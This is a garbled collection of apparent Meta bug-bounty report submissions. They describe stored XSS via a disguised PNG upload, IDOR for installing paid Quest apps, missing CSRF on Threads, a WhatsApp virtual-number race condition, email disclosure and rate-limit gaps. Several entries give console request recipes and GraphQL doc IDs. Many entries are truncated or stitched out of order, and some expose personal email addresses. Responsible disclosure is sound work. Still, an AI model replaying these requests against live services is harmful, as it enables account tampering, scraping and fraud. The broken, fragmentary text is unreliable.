useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"3","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"https://wearables.developer.meta.com/devcenter , here a user can create a project, project has icon, the image upload here doesn't check if it's image or html
xss on cdn","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"repro_steps":"1. Create account here : https://wearables.developer.meta.com/devcenter/
2. Create a project->product listing
3. Create a html file and save it as .png
4. upload malicious png file as icon, while uploading copy cdn url from response
demo https://scontent.fjai2-4.fna.fbcdn.net/m1/v/t0.88565-6/An_q84FTi4yMVKN6SVK43p0PrVeCCG40F5zXLAn7hMtgb6XGTHgOEdZ9G4mmgbvLyzBD8SiwBG2H8ZxznSinVhEArKocGk2VHmikUFGw38q2zGwFPoBz?_nc_gid=fbhtTE5Ppw5JsJuZgMb19A&_nc_oc=AdkbWjlM3aroBJHJ0vTu2gBop8F__42DVfeNBe7N3TR8H6h6wZt9-Jlyb7CWULEFVlQ&ccb=10-5&oh=00_AfllZFYiEA97GxzsusY7xGa8dO1ma1z1DTsA_4e2S-XwnA&oe=69351FD5&_nc_sid=16955c","source":"COMET","subject":"xss on cdn using unrestricted file upload","whitehat_private_bounty_type":null}}
9402602493202387
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"5","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"On Meta.ai, when a user enhances an image with AI, both the image and prompt remain private by default. However, if the user chooses to share the image publicly, it becomes permanently public—even if the prompt is later deleted or its visibility is changed to "only me".
Imagine accidentally sharing something private with AI on Meta.ai, only to realize later that you can%27t undo it,once it%27s public, it%27s public forever","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"505721206438001","repro_steps":"1. Create two accounts on meta.ai
2. Using one account upload an image and ask AI to enhance it or some edits, and share it
3. Copy imageID, its either base64 encoded value or numeric value
4.Delete prompt
5. Using attacker account call this on console
new require(%27AsyncRequest%27)
new AsyncRequest(%27/api/graphql?doc_id=9965933940118400&variables={"media_id":"ul2PDIvMeC4","prompt_id":"","prompt_id_is_null":true,"__relay_internal__pv__KadabraImagineCanvasDevSettingsrelayprovider":false}%27).send()","source":"COMET","subject":"[Meta.ai] images remain accessible to any user, even if the original prompt is deleted or set to "only me".","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}
4970913202987411
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"1","actor_id":"100033825612932","log_session_id":"fb266cc1b57e0706c","app_id":"1105469744241801","waba_id":"426104740578633","onboarding_source":"EMBEDDED_SIGNUP_2","display_name":"New Killldosidthedre","business_profile":{"description":"","vertical_class":"EVENT_PLAN","website":"https://ters.com/","websites":["https://ters.com/"]},"partner_business_id":735040197522676}}
NOTE : Virtual numbers and test numbers may look similar but serve different purposes. Test numbers can only send messages to admins, while virtual numbers work like real WhatsApp numbers.","source":"COMET","subject":"race condition : create lots of free virtual number for whatsapp","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}
7482680791844416
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"2","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"Meta quest for business : read here https://forwork.meta.com/quest/business-subscription
basically its like workplace, but also allows to do something with meta quest device.
here there is a feature which shows work related apps to install into meta quest device, the graphql request which is responsible for doing this is vuln with IDOR and allows any app to get installed regardless if its paid or free.
free free free games","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"1831817386847453","repro_steps":"1. Create an account on work.meta.com,add device and call this on console
new AsyncRequest(%27/api/graphql?variables={"input":{"client_mutation_id":"1","actor_id":"61563045021996","oc_application_id":"APP_ID"},"app_id":"APP_ID"}
25858811387100015
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"external_url":"https://test.com","biography":"I hack Internet for Fun an","is_private":false,"profile_picture_upload_id":null,"remove_profile_picture":false,"copy_ig_profile_picture_to_text_post_app":false,"__relay_internal__pv__BarcelonaIsLinkVerificationEnabledrelayprovider":false}
8108975709165912
click on above link, it will change basic details of account, including making private account to public","source":"COMET","subject":"[threads.net] - No csrf protection","vuln_type":"309076739565597","whitehat_private_bounty_type":null}}
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"applicationID":"[APP_ID]"}
26534466229485935
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"releaseChannelID":""}
in response look for "share_token", as copy this value
5. As UserOther call the request on console as asyncRequest :
new AsyncRequest(%27https://www.oculus.com/experiences/app/7511991128869408/release-channels/1408163293172550/join?token=%27).send()
replace app ID and Release Channel ID, from older invite link which is no longer working
in response it should not return any error, If everything goes smooth, UserOther will be able to join release channel","source":"COMET","subject":"a user in release channel can see invite link, which allows other user to join release channel","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}
7595436947177368
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{}
25472786462365728
replace values and done, It will send collab request to victim without having valid code of victim, we can send multiple invitations too","source":"COMET","subject":"[Work Meta] Invite any organization/company for external relationship without having "relationship ID"","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{input:{userlists:[1324394708243370],release_channel_id:"1345355396178148"}}
24595242403452990
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"10","userlist_id":"1104277373927150","user_emails":["jan26one@optoelectronicsltd.com"]}}
5566956313411189
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"releaseChannelID":"1091119095413653"}
6976127939112262
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"1","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"Feature : "Release channels" let you distribute early versions of your builds to limited audiences for testing or other purposes. You can create public channels for users to subscribe to, or invite different groups of people to private release channels.
Read more here : https://developer.oculus.com/resources/publish-release-channels/
Bug : When we invite a user using email address, It returns UID of user in graphql request which shows pending invitation
NOTE : I reported similar report months ago where "5302791553159678" DOC ID were vuln. Meta fixed this issue by returning null in the field of UID, However, Now Team has made some changes and a new doc id(6942317155827346) is replaced which is vuln.
email to UID of meta/oculus user","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"1831817386847453","repro_steps":"1. Login into oculus account and navigate to developer.oculus.com/manage, Then
a)First create an Organization
b)Then create a New App
2. After creating App, navigate to MyApps->Select App which you have recently created->On left side panel click on Distribution->Release channels->Add new user using Email
3. After inviting victim into Channels, call graphql request which shows pending list of users
>GraphQL which shows pending user :
variables={"after":null,"first":20,"search_term":"","user_type":"PENDING_EMAIL_INVITE","id":"908202637214174"}
6942317155827346
response :
{"node":{"email":"sehalmittal1\u0040gmail.com","alias":"websitedonee","is_employee":false,"__typename":"XOCUserlistUser"}
here alias is username of supplied email","source":"COMET","subject":"inverse email address disclosure","vuln_type":"159350064619250","whitehat_private_bounty_type":null}}
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"1","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"Meta is working on new product called Meta quest for Business, Which is similar to workplace.
Just like Workplace it also has option which allows users to login into account using "magic link"
Magic link : It is an option which allows a user to login into account without entering password, A link is sent to email address, Using link a user can login into it%27s account.
Bug : The magic link is leaking email address of supplied UID
Disclosure of email address of Meta quest user","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"505721206438001","repro_steps":"*In order to perform this attack, Malicious user needs two things 1)CID(company ID) 2)UID of victim
Create Meta Quest Business and Fetch CID and UID
=====
1) Navigate to https://www.meta.com/work/quest-for-business/getting-started/
2)Click on Signup for Beta, And create an account (use business email, Temp mails might not work)
3)After successful creation of Business account, Fetch UID from cookie (cookie name c_user) and call this graphql query to get CID.
variables={}
9008577672501420
*Response : In response it will return two IDs, You need to copy first one.
Attack : Get email address
=====
1)Open a new session and open this link after replace CID and UID
https://work.meta.com/work/signin/magic_link/handle_login/?request_id=test
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"email":"oculus1@npsonlinebook.in"}
5438618626157670
5. We can see the profile picture and public details of userid fetched from above URL by navigating to https://www.oculus.com/deeplink/?action=view
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"2","actor_id":"1010101","product_group_id":"6943000632408441","shop_id":"3632794253406075","visibility_update_action":"HIDE_AND_REMOVE"},"inventoryType":null,"shopID":"3632794253406075"}
In response It should not return any error.
Change the value of visibility_update_action to UNHIDE_AND_ADD to add a product.","source":"COMET","subject":"Any user can hide/add product in commerce shop","vuln_type":"274084149744118","whitehat_private_bounty_type":null}}
4406236179392688
In response It will return "MiniShopStorefront" Copy that ID.
c)Now final request which makes the product hide/unhide :
doc_id=5078615608934465
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"1","actor_id":"100033825612932","attachments_v2":[{"handle":"3:U2NyZWVuc2hvdCUyMDIwMjItMDctMDYlMjBhdCUyMDMuMDkuNTAlMjBBTS5wbmc=:aW1hZ2UvcG5n:ARYkl4XdeSzfo2ASpmMr7wihB55hHovE7z7ek8VPIeL_b9w86XqQAK8Hg4pzOayVB76xNXqhIiXlplrcx4X94JSoau7bWvIjTIBLNUY7MsJs2w:e:1657402834:ARb0Xg2bnSRoH7JTM3E","name":"Screenshot 2022-07-06 at 3.09.50 AM.png"}],"collaborators":[],"description":"Marketplace ( https://www.facebook.com/marketplace/ ) : It is a feature which allows user to sell/buy products on Facebook.
If a user violates marketplace policy user gets banned from accessing marketplace.
Facebook Groups : There are different sub sets can be added to FB groups, One of them is buy
3942272735851468
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"1","actor_id":"100033825612932","attachments_v2":[],"collaborators":[],"description":"Facebook is working on a new product where page admins can send marketing messages to subscribers.
Admin can customize email by its preferences, It also allows Admin to add "Sender Email", Admin can have more than one Sender Email, The sender email needs to be verified first.
Email marketing feature comes under "Leads Center" feature.
BUG : The graphql mutation which verifies the 5-digit code is not rate limited.
A malicious page admin can send marketing messages on behalf of any email address.","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"803196579846402","repro_steps":"Users: UserOne
Environment: UserOne is Admin of PageOne
Browser: n/a
OS: n/a
1. This is new feature in "leads center" called email marketing, You can access it by going https://business.facebook.com/latest/email_marketing?asset_id=
4773726995992800
This is vulnerable and lacking the proper rate limit.
Thanks","source":"COMET","subject":"Missing rate limit while verifying sender email on email marketing","vuln_type":"817832495042950","whitehat_private_bounty_type":null}}
--------------------------------------------------
useWhitehatReportVulnerabilityFormCreateMutation run
FBDL
{"input":{"client_mutation_id":"1","actor_id":"100004933711303","attachments_v2":[],"collaborators":[],"description":"There is a graphql query which returns profile picture of supplied user, The query has no protection against scraping.
scrape profile picture in scale","fbdl_run_id":null,"funnel_session":"","incomplete_fix_of_id":null,"product_area":"476930452665646","repro_steps":"1. run this graphql query with different UID every time :
variables={"videoID":"","userID":""}
3186340558047774
It will return profile picture of supplied user.
PS : I am able to request around ~10k before getting rate limited, the safe limit should be around ~200.","source":"COMET","subject":"Doc_id 3186340558047774 is not properly rate limited","vuln_type":"817832495042950","whitehat_private_bounty_type":"395677605577613"}}
--------------------------------------------------